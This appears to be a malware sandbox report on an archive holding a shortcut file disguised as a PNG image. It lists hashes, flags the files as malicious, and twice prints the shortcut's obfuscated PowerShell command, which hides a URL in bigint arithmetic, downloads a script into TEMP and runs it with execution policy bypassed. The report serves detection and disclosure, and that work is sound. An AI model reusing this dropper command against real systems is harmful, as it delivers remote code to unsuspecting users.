Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
debd3f013eacb8241b6a94d1e0d8fb1a
Sha1
0a88154a22734420c80cd76af1b0d77d003d807c
Sha256
f434146cddd6d79f9dbd8ef7733952ea97a7d324d7b173f0633ba385e909d30b
Sha384
91099315163e79cf2af3de989a8eeb487f3636d567410c680b581adc5c4baaca6ffdd7a973e01357c17070cd5547d904
Sha512
7e7631fce27dae1971cb819f24c022b8f4d7d62ff231d8cb26e8a96213cc75bb1ce5318f50b21a9b7fa3ac86c4f4951126716cddc9f19ff3130aac7bfa4f2d65
SSDeep
48:9nbzfKtJLY8tv3kmrBBG1MC0KP9R/jMH+05IIPRXkFu1x8vFHiuR/Slt:dbzinY8tNrS1jFpMHhkIuAuRK
TLSH
E25109577B12B876E727BE79C42407E91D3ED0C180B186FCA98B9B9C0CF9F974A60494
File Structure
debd3f013eacb8241b6a94d1e0d8fb1a
Malicious
MP-137579102.mp4
IMG-285912218.png.lnk
Malicious
LNK CommandLine
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -ep bypass -c "$v=[bigint]\"15672546134675896723056169814999628033923469\";$r=[bigint]\"6139403790910975759451908051327495543859753\";$x=$v - $r;while($x -ne 0){$e+=[char]([int]($x -band 0xFF));$x=$x -shr 8};iwr $e -OutFile $env:TEMP\ZNmmIvD5.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\ZNmmIvD5.ps1"
debd3f013eacb8241b6a94d1e0d8fb1a (2.56 KB)
File Structure
debd3f013eacb8241b6a94d1e0d8fb1a
Malicious
MP-137579102.mp4
IMG-285912218.png.lnk
Malicious
LNK CommandLine
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe -ep bypass -c "$v=[bigint]\"15672546134675896723056169814999628033923469\";$r=[bigint]\"6139403790910975759451908051327495543859753\";$x=$v - $r;while($x -ne 0){$e+=[char]([int]($x -band 0xFF));$x=$x -shr 8};iwr $e -OutFile $env:TEMP\ZNmmIvD5.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\ZNmmIvD5.ps1"

Malicious

debd3f013eacb8241b6a94d1e0d8fb1a > IMG-285912218.png.lnk
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙